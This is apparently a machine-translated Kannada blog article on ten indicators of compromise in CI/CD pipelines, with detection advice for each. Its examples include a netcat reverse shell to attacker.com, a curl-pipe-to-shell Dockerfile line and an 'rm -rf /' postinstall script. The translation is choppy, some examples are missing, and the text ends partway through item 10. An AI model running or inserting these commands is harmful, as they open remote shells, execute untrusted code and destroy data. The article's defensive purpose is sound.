ರಾಜಿಯ ಟಾಪ್ 10 ಸೂಚಕಗಳು CI/CD Pipelines

ಪರಿವಿಡಿ

ಓದಲೇಬೇಕಾದ ಪೋಸ್ಟ್‌ಗಳು

ಇತ್ತೀಚಿನ ಆಸಕ್ತಿಯ ಪೋಸ್ಟ್‌ಗಳು

ಪರಿಚಯ: ಸೈಬರ್ ಭದ್ರತೆಯಲ್ಲಿ ರಾಜಿಯ ಸೂಚಕಗಳು ಯಾವುವು?

ರಾಜಿ ಸೂಚಕಗಳು ನಿಮ್ಮ ವ್ಯವಸ್ಥೆಯು ಅಥವಾ pipeline ದಾಳಿಗೆ ಒಳಗಾಗಿರಬಹುದು. ಸರಳವಾಗಿ ಹೇಳುವುದಾದರೆ, ರಾಜಿ ಸೂಚಕಗಳು ದಾಳಿಕೋರರು ಬಿಟ್ಟುಹೋದ ಕುರುಹುಗಳು ವಿಚಿತ್ರವೆನಿಸುತ್ತದೆಯೇ? logins, ಫೈಲ್ ಬದಲಾವಣೆಗಳು, ಅಥವಾ ಮರೆಮಾಡಿದ ಮಾಲ್‌ವೇರ್. ಇನ್ ಐಒಸಿ ಸೈಬರ್ ಭದ್ರತೆ, ಅವು ಅಪರಾಧ ಸ್ಥಳದಲ್ಲಿ ಬೆರಳಚ್ಚುಗಳಂತೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತವೆ, ಏನೋ ತಪ್ಪಾಗಿದೆ ಎಂಬುದಕ್ಕೆ ಸ್ಪಷ್ಟ ಪುರಾವೆಗಳನ್ನು ನೀಡುತ್ತವೆ. ಆದ್ದರಿಂದ, ಡೆವಲಪರ್‌ಗಳು ಕೇಳಿದಾಗ ರಾಜಿ ಸೂಚಕಗಳು ಯಾವುವು?, ಉತ್ತರವು ಸರ್ವರ್‌ಗಳು ಅಥವಾ ಫೈರ್‌ವಾಲ್‌ಗಳಿಗೆ ಸೀಮಿತವಾಗಿಲ್ಲ, ಇದು ಆಧುನಿಕದಲ್ಲಿ ಅಡಗಿರುವ ಅಪಾಯಗಳನ್ನು ಸಹ ಒಳಗೊಂಡಿದೆ CI/CD pipelines.

ಇವುಗಳಲ್ಲಿ pipelines ನಲ್ಲಿ, ದಾಳಿಕೋರರು ಕೋಡ್ ಅನ್ನು ತಿರುಚಬಹುದು, ದುರುದ್ದೇಶಪೂರಿತ ಅವಲಂಬನೆಗಳನ್ನು ಇಂಜೆಕ್ಟ್ ಮಾಡಬಹುದು ಅಥವಾ ಬಿಲ್ಡ್ ಹಂತಗಳನ್ನು ಗಮನಿಸದೆ ಬದಲಾಯಿಸಬಹುದು. ಆದಾಗ್ಯೂ, ಹೆಚ್ಚಿನ ಮಾರ್ಗದರ್ಶಿಗಳು ಇನ್ನೂ ಸರ್ವರ್‌ಗಳು ಅಥವಾ ನೆಟ್‌ವರ್ಕ್‌ಗಳ ಮೇಲೆ ಮಾತ್ರ ಗಮನಹರಿಸುತ್ತಾರೆ. ಪರಿಣಾಮವಾಗಿ, ಸಾಫ್ಟ್‌ವೇರ್ ಪೂರೈಕೆ ಸರಪಳಿಯು ಸುಲಭವಾದ ಗುರಿಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ.

ಅದಕ್ಕಾಗಿಯೇ ರಾಜಿಯ ಸೂಚಕಗಳನ್ನು ಕಂಡುಹಿಡಿಯುವುದು CI/CD pipelines ಅತ್ಯಗತ್ಯ. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ, ಇದು ತಂಡಗಳಿಗೆ ಮಾಲ್‌ವೇರ್‌ಗಳನ್ನು ನಿರ್ಬಂಧಿಸಲು, ರಹಸ್ಯಗಳನ್ನು ರಕ್ಷಿಸಲು ಮತ್ತು ಸಾಫ್ಟ್‌ವೇರ್ ವಿತರಣೆಯ ಪ್ರತಿಯೊಂದು ಹಂತವನ್ನು ಸುರಕ್ಷಿತಗೊಳಿಸಲು ಸಹಾಯ ಮಾಡುತ್ತದೆ.

ರಾಜಿಯ ಟಾಪ್ 10 ಸೂಚಕಗಳು CI/CD Pipelines

ರಾಜಿ ಸೂಚಕಗಳನ್ನು ವಿವರಿಸುವಾಗ, ಹೆಚ್ಚಿನ ಪಟ್ಟಿಗಳು ಸರ್ವರ್‌ಗಳು ಅಥವಾ ನೆಟ್‌ವರ್ಕ್‌ಗಳ ಮೇಲೆ ಕೇಂದ್ರೀಕರಿಸುತ್ತವೆ. ಆದರೂ CI/CD pipelineಗಳಲ್ಲಿ, ದಾಳಿಕೋರರು ವಿಭಿನ್ನ ಫಿಂಗರ್‌ಪ್ರಿಂಟ್‌ಗಳನ್ನು ಬಿಡುತ್ತಾರೆ. ಈ ಸಂಕೇತಗಳನ್ನು ಗುರುತಿಸುವುದು ಪೂರ್ವಭಾವಿ ರಕ್ಷಣೆಗೆ ನಿರ್ಣಾಯಕವಾಗಿದೆ. ಪ್ರತಿಯೊಬ್ಬ ಡೆವಲಪರ್ ಮತ್ತು ಭದ್ರತಾ ಎಂಜಿನಿಯರ್ ಗಮನಿಸಬೇಕಾದ 10 IOC ಸೈಬರ್ ಭದ್ರತಾ ಎಚ್ಚರಿಕೆಗಳು ಇಲ್ಲಿವೆ.

1. ಅನುಮಾನಾಸ್ಪದ ಅವಲಂಬನೆ ಬದಲಾವಣೆಗಳು

ರಾಜಿಯ ಪ್ರಮುಖ ಸೂಚಕಗಳಲ್ಲಿ ಒಂದು pipelines ಎಂಬುದು ಹಠಾತ್, ವಿಚಿತ್ರ ಅವಲಂಬನೆ ನವೀಕರಣವಾಗಿದೆ. ಅಪಾಯಕಾರಿ ಪ್ಯಾಕೇಜ್‌ಗಳನ್ನು ಸೇರಿಸಲು ದಾಳಿಕೋರರು ಸಾಮಾನ್ಯವಾಗಿ ಪ್ಯಾಕೇಜ್ ಮ್ಯಾನೇಜರ್‌ಗಳಲ್ಲಿ ಡೆವಲಪರ್‌ಗಳ ವಿಶ್ವಾಸಾರ್ಹ ಸ್ಥಾನವನ್ನು ಬಳಸುತ್ತಾರೆ.

ಉದಾಹರಣೆಗೆ, npm a ನಲ್ಲಿ package.json ವ್ಯತ್ಯಾಸವು ಇದ್ದಕ್ಕಿದ್ದಂತೆ ಒಳಗೊಂಡಿರಬಹುದು:

ಅಂತಹ ಬದಲಾವಣೆಗಳು ಸುರಕ್ಷಿತವಾಗಿ ಕಾಣಿಸಬಹುದು ಆದರೆ ಪ್ರತಿಯೊಂದು ನಿರ್ಮಾಣಕ್ಕೂ ಟ್ರೋಜನೈಸ್ಡ್ ಕೋಡ್ ಅನ್ನು ಸೇರಿಸಬಹುದು.

ಪರಿಣಾಮ: ಅಪಾಯಕ್ಕೀಡಾದ ನಿರ್ಮಾಣಗಳು ಮೂಲದಲ್ಲೇ ಮಾಲ್‌ವೇರ್ ಅನ್ನು ಪಡೆದುಕೊಳ್ಳುತ್ತವೆ.

ಪತ್ತೆ: ಅವಲಂಬನೆ ವಿಮರ್ಶೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸಿ, ಲಾಕ್‌ಫೈಲ್ ವ್ಯತ್ಯಾಸಗಳನ್ನು ಟ್ರ್ಯಾಕ್ ಮಾಡಿ ಮತ್ತು ಎಲ್ಲಾ ಸಮಯದಲ್ಲೂ ಹೊಸ ಪ್ಯಾಕೇಜ್‌ಗಳನ್ನು ಸ್ಕ್ಯಾನ್ ಮಾಡಿ.

2. ಬಿಲ್ಡ್‌ಗಳಲ್ಲಿ ಮಸುಕಾದ ಕೋಡ್ 

ಮಾಲ್‌ವೇರ್ ಲೇಖಕರು ವಿಮರ್ಶೆಗಳನ್ನು ಬೈಪಾಸ್ ಮಾಡಲು ಅಸ್ಪಷ್ಟತೆಯನ್ನು ಅವಲಂಬಿಸಿದ್ದಾರೆ. ಪರಿಣಾಮವಾಗಿ, ಈ ರಾಜಿ ಸೂಚಕವು CI/CD pipelines ಅನ್ನು ಹಿಡಿಯುವುದು ಅತ್ಯಂತ ಕಷ್ಟಕರವಾದ ಕಾರ್ಯಗಳಲ್ಲಿ ಒಂದಾಗಿರಬಹುದು. ವಾಸ್ತವವಾಗಿ, ಅಸ್ಪಷ್ಟ ಪೇಲೋಡ್‌ಗಳು ಸಾಮಾನ್ಯವಾಗಿ ಸೂಚನೆ ಇಲ್ಲದೆ ಮುಕ್ತ ಮೂಲ ಗ್ರಂಥಾಲಯಗಳು ಅಥವಾ ಕಂಟೇನರ್ ಚಿತ್ರಗಳಿಗೆ ಜಾರಿಕೊಳ್ಳುತ್ತವೆ.

ಉದಾಹರಣೆಗೆ:

  • ಬಳಸುತ್ತಿರುವ PyPI ಪ್ಯಾಕೇಜ್ base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • ಅಗತ್ಯವಿಲ್ಲದ UPX ಬೈನರಿಗಳಿಂದ ತುಂಬಿದ ಡಾಕರ್ ಚಿತ್ರ.
  • ಜಾವಾಸ್ಕ್ರಿಪ್ಟ್ ತುಂಬಿದೆ \x41\x42 ರುಜುವಾತು ಕಳ್ಳರನ್ನು ಅಡಗಿಸಿ ತಪ್ಪಿಸಿಕೊಳ್ಳುತ್ತಾನೆ.

ಪರಿಣಾಮ: ಗುಪ್ತ ಕೋಡ್ ನಿರ್ಮಾಣ ಅಥವಾ ರನ್‌ಟೈಮ್ ಸಮಯದಲ್ಲಿ ಮೌನವಾಗಿ ಕಾರ್ಯಗತಗೊಳ್ಳುತ್ತದೆ, ಇದು IOC ಸೈಬರ್ ಭದ್ರತೆಯಲ್ಲಿ ನಿರ್ಣಾಯಕ ಸಂಕೇತವಾಗಿದೆ.
ಪತ್ತೆ: ಸಂಯೋಜಿಸಿ SAST ಎನ್‌ಕೋಡ್ ಮಾಡಿದ ಅಥವಾ ಪ್ಯಾಕ್ ಮಾಡಿದ ಕೋಡ್ ಅನ್ನು ಫ್ಲ್ಯಾಗ್ ಮಾಡಲು ಮಾಲ್‌ವೇರ್ ಸ್ಕ್ಯಾನಿಂಗ್‌ನೊಂದಿಗೆ. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ, ಮಸುಕನ್ನು ಹೆಚ್ಚಿನ ತನಿಖೆಗೆ ಅರ್ಹವಾದ ಕೆಂಪು ಧ್ವಜವಾಗಿ ಪರಿಗಣಿಸಿ.

3. Git ನಲ್ಲಿ ಬಹಿರಂಗಪಡಿಸಿದ ರಹಸ್ಯಗಳು: ಒಂದು ಶ್ರೇಷ್ಠ IOC ಸೈಬರ್ ಭದ್ರತಾ ಅಪಾಯ

CI/CD pipelineಬಳಕೆದಾರರು ಸಾಮಾನ್ಯವಾಗಿ ರಹಸ್ಯಗಳನ್ನು ನೇರವಾಗಿ ಸಂಗ್ರಹಗಳಿಂದ ಪಡೆದುಕೊಳ್ಳುತ್ತಾರೆ. ಆದಾಗ್ಯೂ, Git ನಲ್ಲಿ ರಹಸ್ಯಗಳು ಕಾಣಿಸಿಕೊಂಡಾಗ, ಅವು "ರಾಜಿ ಸೂಚಕಗಳು ಯಾವುವು" ಎಂಬ ಪ್ರಶ್ನೆಗೆ ಸ್ಪಷ್ಟ ಉತ್ತರಗಳಲ್ಲಿ ಒಂದಾಗುತ್ತವೆ pipelines?” ಒಮ್ಮೆ ರುಜುವಾತುಗಳು Git ನಲ್ಲಿ ಇಳಿದರೆ, ದಾಳಿಕೋರರು ಅವುಗಳನ್ನು ಅನಿರ್ದಿಷ್ಟವಾಗಿ ಬಳಸಿಕೊಳ್ಳಬಹುದು.

ಉದಾಹರಣೆಗೆ:

  • A .env ಹೊಂದಿರುವ ಫೈಲ್ AWS_SECRET_KEY=.
  • ಟೋಕನ್‌ಗಳನ್ನು ಒಳಕ್ಕೆ ತಳ್ಳಲಾಗಿದೆ config.json.
  • ತೆಗೆದುಹಾಕಿದ ನಂತರವೂ Git ಇತಿಹಾಸದಲ್ಲಿ ರಹಸ್ಯಗಳು ಗೋಚರಿಸುತ್ತವೆ.

ಪರಿಣಾಮ: ತೆರೆದ ಕೀಲಿಗಳು ದಾಳಿಕೋರರಿಗೆ ನೇರ ಪ್ರವೇಶವನ್ನು ನೀಡುತ್ತವೆ CI/CD pipelineಗಳು, ಕ್ಲೌಡ್ ಸಿಸ್ಟಮ್‌ಗಳು ಅಥವಾ ಡೇಟಾಬೇಸ್‌ಗಳು. ಆದ್ದರಿಂದ ಇದು ರಾಜಿಯ ಅತ್ಯಂತ ಅಪಾಯಕಾರಿ ಸೂಚಕಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ.
ಪತ್ತೆ: ಬಳಸಿ pre-commit hooks ಮತ್ತು ರಹಸ್ಯ ಸ್ಕ್ಯಾನಿಂಗ್‌ಗಾಗಿ CI ಕೆಲಸಗಳು, ಮತ್ತು ಸೋರಿಕೆಯಾದ ಕೀಗಳನ್ನು ತಕ್ಷಣವೇ ರದ್ದುಗೊಳಿಸಿ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಎಕ್ಸ್‌ಪೋಸರ್ ವಿಂಡೋಗಳನ್ನು ಕಡಿಮೆ ಮಾಡಲು ಸ್ವಯಂಚಾಲಿತ ಪರಿಹಾರವನ್ನು ಜಾರಿಗೊಳಿಸಿ.

4. ಹಾಳಾದ Pipeline ಸಂರಚನೆಗಳು: ರಾಜಿಯ ಗುಪ್ತ ಸೂಚಕಗಳು

Pipeline ಸಂರಚನೆಗಳು ಹೆಚ್ಚಿನ ಮೌಲ್ಯದ ಗುರಿಗಳಾಗಿವೆ ಏಕೆಂದರೆ ಒಂದೇ ಮಾರ್ಪಾಡು ಸಾಮಾನ್ಯವಾಗಿ ಇಡೀ ಕೆಲಸದ ಹರಿವನ್ನು ಅಪಹರಿಸುತ್ತದೆಪರಿಣಾಮವಾಗಿ, ತಿದ್ದುಪಡಿ ಮಾಡಲಾಗಿದೆ pipeline ಫೈಲ್‌ಗಳು ಸಾಂಪ್ರದಾಯಿಕ ಮೇಲ್ವಿಚಾರಣಾ ಸಾಧನಗಳು ವಿರಳವಾಗಿ ಪತ್ತೆಹಚ್ಚುವ ಪ್ರಮುಖ IOC ಸೈಬರ್ ಭದ್ರತಾ ಅಪಾಯವಾಗಿದೆ.

ಉದಾಹರಣೆಗೆ:

  • GitHub ಕ್ರಿಯೆಗಳಲ್ಲಿ:

  • GitLab ನಲ್ಲಿ: ದುರುದ್ದೇಶಪೂರಿತ ಕೆಲಸವನ್ನು ಸೇರಿಸಲಾಗಿದೆ .gitlab-ci.yml ಅದು ಸೂಕ್ಷ್ಮ ಡೇಟಾವನ್ನು ಡಂಪ್ ಮಾಡುತ್ತದೆ.
  • ಜೆಂಕಿನ್ಸ್‌ನಲ್ಲಿ: sh "nc -e /bin/bash attacker.com 4444".

ಪರಿಣಾಮ: ಈ ಅನುಮೋದಿಸದ ಬದಲಾವಣೆಗಳು ನಿಮ್ಮ pipeline ದಾಳಿಕೋರರಿಗೆ ಶಾಶ್ವತ ಹಿಂಬಾಗಿಲಾಗಿ, ಇದು ರಾಜಿಯ ಸೂಚಕವಾಗಿ ಸ್ಪಷ್ಟವಾಗಿ ಎಣಿಕೆಯಾಗುತ್ತದೆ.
ಪತ್ತೆ: ಸಹಿ ಮಾಡಿದ ಸಂರಚನೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸಿ, PR ಅನುಮೋದನೆಗಳನ್ನು ಪಡೆಯಿರಿ ಮತ್ತು ಅನಿರೀಕ್ಷಿತ ಕೆಲಸಗಳಿಗಾಗಿ ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಿ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಹೊಂದಿಸಿ guardrails ಅದು ಬದಲಾದ ಕೆಲಸದ ಹರಿವುಗಳನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ನಿರ್ಬಂಧಿಸುತ್ತದೆ.

5. ಸವಲತ್ತು IaC ಡೀಫಾಲ್ಟ್‌ಗಳು 

ತಪ್ಪಾಗಿ ಕಾನ್ಫಿಗರ್ ಮಾಡಲಾದ ಮೂಲಸೌಕರ್ಯ ವ್ಯಾಖ್ಯಾನಗಳು ಹೆಚ್ಚಾಗಿ ಗುಪ್ತ ಹಿಂಬಾಗಿಲುಗಳನ್ನು ಸೃಷ್ಟಿಸುತ್ತವೆ. ಪರಿಣಾಮವಾಗಿ, ಸವಲತ್ತು ಪಡೆದ ಡೀಫಾಲ್ಟ್‌ಗಳು IaC ಐಒಸಿ ಸೈಬರ್ ಭದ್ರತಾ ಅಪಾಯವು ಒಂದು ಶ್ರೇಷ್ಠವಾಗಿದೆ.

ಉದಾಹರಣೆಗೆ:

  • ಪಾಡ್‌ಗಳನ್ನು ನೀಡುವ ಕುಬರ್ನೆಟ್ಸ್ ನಿಯೋಜನೆ privileged: true.
  • ಹೆಲ್ಮ್ ಚಾರ್ಟ್‌ಗಳು ಸೇವೆಗಳನ್ನು ಬಹಿರಂಗಪಡಿಸುವುದು 0.0.0.0:22.

ಪರಿಣಾಮ: ದಾಳಿಕೋರರು ಮೂಲ ಮಟ್ಟದ ಪ್ರವೇಶವನ್ನು ಪಡೆಯುತ್ತಾರೆ ಅಥವಾ ಆಂತರಿಕ ಸೇವೆಗಳನ್ನು ಸಾರ್ವಜನಿಕವಾಗಿ ಬಹಿರಂಗಪಡಿಸುತ್ತಾರೆ. ಪರಿಣಾಮವಾಗಿ, ಈ ಸಮಸ್ಯೆಗಳು ದಾಳಿಯ ಮೇಲ್ಮೈಯನ್ನು ಗಮನಾರ್ಹವಾಗಿ ವಿಸ್ತರಿಸುತ್ತವೆ.
ಪತ್ತೆ: ಅನ್ವಯಿಸು IaC ವಿಲೀನಗೊಳ್ಳುವ ಮೊದಲು ಕನಿಷ್ಠ ಸವಲತ್ತನ್ನು ಜಾರಿಗೊಳಿಸಲು ಸ್ಕ್ಯಾನಿಂಗ್ ಮಾಡಲಾಗುತ್ತಿದೆ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಪ್ರತಿಯೊಂದು ಸಂರಚನೆಯನ್ನು ಭಾಗವಾಗಿ ಪರಿಶೀಲಿಸಲಾಗಿದೆಯೆ ಎಂದು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಿ pipeline.

6. ಅಸಾಮಾನ್ಯ ಮೈಕಟ್ಟು ನಡವಳಿಕೆಗಳು 

ದಾಳಿಕೋರರು ಆಗಾಗ್ಗೆ ಬದಲಾಗುತ್ತಾರೆ pipeline ದುರುದ್ದೇಶಪೂರಿತ ಕ್ರಿಯೆಗಳಲ್ಲಿ ಜಾರಿಬೀಳುವ ನಡವಳಿಕೆ. ಬೇರೆ ರೀತಿಯಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ಅಸಾಮಾನ್ಯ ನಿರ್ಮಾಣ ಚಟುವಟಿಕೆಯು ರಾಜಿಯ ಸೂಚಕಗಳು ಯಾವುವು ಎಂಬುದಕ್ಕೆ ಸ್ಪಷ್ಟ ಉತ್ತರಗಳಲ್ಲಿ ಒಂದಾಗಿದೆ. CI/CD pipelines.

ಉದಾಹರಣೆಗೆ:

  • ವಿಚಿತ್ರ ಡೊಮೇನ್‌ಗಳಿಗೆ ಹೊರಹೋಗುವ ನೆಟ್‌ವರ್ಕ್ ವಿನಂತಿಗಳನ್ನು ಮಾಡುವ ಬಿಲ್ಡ್‌ಗಳು.
  • Node.js ಯೋಜನೆಯು ಇದ್ದಕ್ಕಿದ್ದಂತೆ ಪವರ್‌ಶೆಲ್ ಅನ್ನು ಹುಟ್ಟುಹಾಕುತ್ತದೆ npm install.
  • ಬಿಲ್ಡ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳಲ್ಲಿ ವ್ಯಾಖ್ಯಾನಿಸದ ದೊಡ್ಡ ಬೈನರಿಗಳನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡುವ CI ಕೆಲಸ.

ಪರಿಣಾಮ: ರಾಜಿ ಮಾಡಿಕೊಂಡ ನಿರ್ಮಾಣಗಳು ಮಾಲ್‌ವೇರ್ ವಿತರಣಾ ಕೇಂದ್ರಗಳಾಗಿ ಕಾರ್ಯನಿರ್ವಹಿಸಬಹುದು. ಎಲ್ಲಕ್ಕಿಂತ ಹೆಚ್ಚಾಗಿ, ಅವು ಪ್ರತಿಯೊಂದು ನಿಯೋಜನೆಯಲ್ಲೂ ದುರುದ್ದೇಶಪೂರಿತ ಪೇಲೋಡ್‌ಗಳನ್ನು ಹರಡುತ್ತವೆ.
ಪತ್ತೆ: ಅನಿರೀಕ್ಷಿತ ಪ್ರಕ್ರಿಯೆಗಳು ಅಥವಾ ಸಂಪರ್ಕಗಳಿಗಾಗಿ ಬಿಲ್ಡ್ ಲಾಗ್‌ಗಳನ್ನು ಮೇಲ್ವಿಚಾರಣೆ ಮಾಡಿ. ಇದಲ್ಲದೆ, ರೂಢಿಯ ಹೊರಗಿನ ನಡವಳಿಕೆಗಳನ್ನು ಫ್ಲ್ಯಾಗ್ ಮಾಡಲು ಅಸಂಗತತೆ ಪತ್ತೆಹಚ್ಚುವಿಕೆಯನ್ನು ಕಾನ್ಫಿಗರ್ ಮಾಡಿ.

7. IOC ಸೈಬರ್ ಭದ್ರತಾ ಅಪಾಯಗಳಾಗಿ ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು

ಪ್ಯಾಕೇಜ್ ವ್ಯವಸ್ಥಾಪಕರು ಜೀವನಚಕ್ರವನ್ನು ಬೆಂಬಲಿಸುತ್ತಾರೆ hooks ದಾಳಿಕೋರರು ಬಳಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಆದ್ದರಿಂದ, npm, PyPI, ಅಥವಾ Dockerfiles ನಲ್ಲಿನ ದುರುದ್ದೇಶಪೂರಿತ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳು ರಾಜಿಯ ಬಲವಾದ ಸೂಚಕಗಳಾಗಿವೆ.

ಉದಾಹರಣೆಗೆ:

  • ಎನ್ಪಿಎಂ: postinstall ಸ್ಕ್ರಿಪ್ಟ್ ಚಾಲನೆಯಲ್ಲಿದೆ rm -rf / ಅಥವಾ C2 ಗೆ ಬೀಕನ್ ಮಾಡುವುದು.
  • ಪಿಪಿಐ: setup.py ಅನುಸ್ಥಾಪನೆಯಲ್ಲಿ ಗುಪ್ತ ಪೈಥಾನ್ ಕೋಡ್ ಅನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವುದು.
  • ಡಾಕರ್‌ಫೈಲ್: RUN curl attacker.sh | sh.

ಪರಿಣಾಮ: ಯಾವುದೇ ರನ್‌ಟೈಮ್ ಪರೀಕ್ಷೆಯ ಮೊದಲು, ಅನುಸ್ಥಾಪನೆಯ ಸಮಯದಲ್ಲಿ ದಾಳಿ ನಡೆಯುತ್ತದೆ. ಪರಿಣಾಮವಾಗಿ, ಡೆವಲಪರ್‌ಗಳು ತಡವಾಗುವವರೆಗೂ ಗಮನಿಸದೇ ಇರಬಹುದು.
ಪತ್ತೆ: ಇನ್‌ಸ್ಟಾಲ್ ಸ್ಕ್ರಿಪ್ಟ್‌ಗಳಿಗಾಗಿ ಸ್ಕ್ಯಾನ್ ಪ್ಯಾಕೇಜ್ ಮ್ಯಾನಿಫೆಸ್ಟ್‌ಗಳು. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಅಪಾಯಕಾರಿ ಎಂದು ನಿರ್ಬಂಧಿಸಿ hooks in CI/CD ಮಾನ್ಯತೆ ಕಡಿಮೆ ಮಾಡಲು ಕೆಲಸಗಳು.

8. ರಾಜಿಯ ನೋಂದಾವಣೆ ವಿಷ ಸೂಚಕಗಳು

ದಾಳಿಕೋರರು ನೋಂದಣಿಗಳಲ್ಲಿ ಕಲಾಕೃತಿಗಳನ್ನು ಬದಲಾಯಿಸುತ್ತಾರೆ ಅಥವಾ ಮಾರ್ಪಡಿಸುತ್ತಾರೆ, ಮತ್ತು ಈ ಘಟನೆಗಳು ಪೂರೈಕೆ ಸರಪಳಿಯಲ್ಲಿ ರಾಜಿಯ ಸೂಚಕಗಳು ಯಾವುವು ಎಂಬುದಕ್ಕೆ ಪಠ್ಯಪುಸ್ತಕ ಉದಾಹರಣೆಗಳಾಗಿವೆ. pipelines.

ಉದಾಹರಣೆಗೆ:

  • ಟ್ರೋಜನೈಸ್ಡ್ ಲೇಯರ್‌ನೊಂದಿಗೆ ಡಾಕರ್ ಇಮೇಜ್ ಟ್ಯಾಗ್ ಅನ್ನು ಮೌನವಾಗಿ ನವೀಕರಿಸಲಾಗಿದೆ.
  • ಆಂತರಿಕ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ವಿಷಪೂರಿತ ಆವೃತ್ತಿಯೊಂದಿಗೆ ಬದಲಾಯಿಸಲಾಗಿದೆ.
  • npm ನೇಮ್‌ಸ್ಪೇಸ್ ಸ್ಕ್ವಾಟಿಂಗ್, ಉದಾಹರಣೆಗೆ lodash-proxy.

ಪರಿಣಾಮ: ರಿಜಿಸ್ಟ್ರಿ ಆರ್ಟಿಫ್ಯಾಕ್ಟ್ ಬಳಸುವ ಪ್ರತಿಯೊಂದು ನಿರ್ಮಾಣವು ಅಪಾಯಕ್ಕೆ ಸಿಲುಕುತ್ತದೆ. ಅಷ್ಟೇ ಅಲ್ಲ, ಈ ಅಪಾಯವು ಕೆಳಮುಖ ಸೇವೆಗಳಿಗೂ ಹರಡುತ್ತದೆ.
ಪತ್ತೆ: ಎಲ್ಲಾ ರಿಜಿಸ್ಟ್ರಿ ಪುಲ್‌ಗಳಲ್ಲಿ ಸಹಿ ಮತ್ತು ಸಮಗ್ರತೆಯ ಪರಿಶೀಲನೆಗಳನ್ನು ಜಾರಿಗೊಳಿಸಿ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಕಲಾಕೃತಿಯ ಮೂಲವನ್ನು ಟ್ರ್ಯಾಕ್ ಮಾಡಿ SBOM ಮೌಲ್ಯೀಕರಣ.

9. IOC ಸಾಕ್ಷಿಯಾಗಿ ಅಸಂಗತ ಬಳಕೆದಾರ ಚಟುವಟಿಕೆ

ರಾಜಿ ಮಾಡಿಕೊಂಡ ಖಾತೆಗಳು ಯಾವಾಗಲೂ ಅಸಹಜ ಕುರುಹುಗಳನ್ನು ಬಿಟ್ಟು ಹೋಗುತ್ತವೆ. ಅಂತೆಯೇ, ಅಸಾಮಾನ್ಯ ಡೆವಲಪರ್ ನಡವಳಿಕೆಯು ರಾಜಿಯ ಬಲವಾದ ಸೂಚಕವಾಗಿದೆ.

ಉದಾಹರಣೆಗೆ:

  • Commitಸ್ಥಳೀಯ ಸಮಯ ಬೆಳಿಗ್ಗೆ 3 ಗಂಟೆಗೆ ತಳ್ಳಲಾಯಿತು.
  • ರಜೆಯ ಮೇಲೆ ಖಾತೆಗಳಿಂದ PR ಅನುಮೋದನೆಗಳು.
  • Pipelineಅಸಾಮಾನ್ಯ ಆವರ್ತನದಲ್ಲಿ ಪ್ರಚೋದಿಸಲ್ಪಡುತ್ತದೆ.

ಪರಿಣಾಮ: ದುರುದ್ದೇಶಪೂರಿತ ಬದಲಾವಣೆಗಳನ್ನು ಸೇರಿಸಲು ದಾಳಿಕೋರರು ಕದ್ದ ರುಜುವಾತುಗಳನ್ನು ದುರುಪಯೋಗಪಡಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಎಲ್ಲಾ ನಂತರ, ಅನಧಿಕೃತ commitಗಳು ಸಾಮಾನ್ಯ ಕೆಲಸದ ಹರಿವುಗಳಲ್ಲಿ ಸುಲಭವಾಗಿ ಮಿಶ್ರಣಗೊಳ್ಳುತ್ತವೆ.
ಪತ್ತೆ: ಮಾನಿಟರ್ SCM ವೈಪರೀತ್ಯಗಳಿಗಾಗಿ ಚಟುವಟಿಕೆ, MFA ಜಾರಿಗೊಳಿಸಿ ಮತ್ತು ನಿಯಮಿತವಾಗಿ ಟೋಕನ್‌ಗಳನ್ನು ತಿರುಗಿಸಿ. ಹೆಚ್ಚುವರಿಯಾಗಿ, ಅನುಮಾನಾಸ್ಪದ ವ್ಯಕ್ತಿಗಳ ಬಗ್ಗೆ ಎಚ್ಚರಿಕೆ ನೀಡಿ commit ಅಥವಾ ಅನುಮೋದನೆ ಮಾದರಿಗಳು.

10. IOC ಸೈಬರ್ ಸೆಕ್ಯುರಿಟಿಯಲ್ಲಿ ವಿಫಲವಾದ ಸಮಗ್ರತೆ ಅಥವಾ ಸಹಿ ಪರಿಶೀಲನೆಗಳು

ಸಾಮಾನ್ಯ ಆದರೆ ನಿರ್ಲಕ್ಷಿಸಲಾಗಿದೆ ರಾಜಿ ಸೂಚಕ ವಿಫಲವಾದ ಸಮಗ್ರತೆ ಅಥವಾ ಸಹಿ ಪರಿಶೀಲನೆಯಾಗಿದೆ. IOC ಸೈಬರ್ ಭದ್ರತೆಯಲ್ಲಿ, ಈ ಪರಿಶೀಲನೆಗಳು ಕೋಡ್ ಅಥವಾ ಕಲಾಕೃತಿಗಳು ಅಧಿಕೃತವೇ ಎಂದು ಪರಿಶೀಲಿಸುತ್ತವೆ. ಅವುಗಳನ್ನು ಬಿಟ್ಟುಬಿಡುವುದರಿಂದ pipelineಗಳನ್ನು ಬಹಿರಂಗಪಡಿಸಲಾಗಿದೆ.

ಉದಾಹರಣೆಗಳು:

  • SHA256 ಹ್ಯಾಶ್ ನಿರೀಕ್ಷಿತ ಚೆಕ್ಸಮ್‌ಗೆ ಹೊಂದಿಕೆಯಾಗುತ್ತಿಲ್ಲ.
  • ಕಾಣೆಯಾದ ಅಥವಾ ಅಮಾನ್ಯವಾದ GPG ಸಹಿ.
  • An SBOM ಸಹಿ ಮಾಡದ ಕಲಾಕೃತಿಗಳನ್ನು ತೋರಿಸಲಾಗುತ್ತಿದೆ.

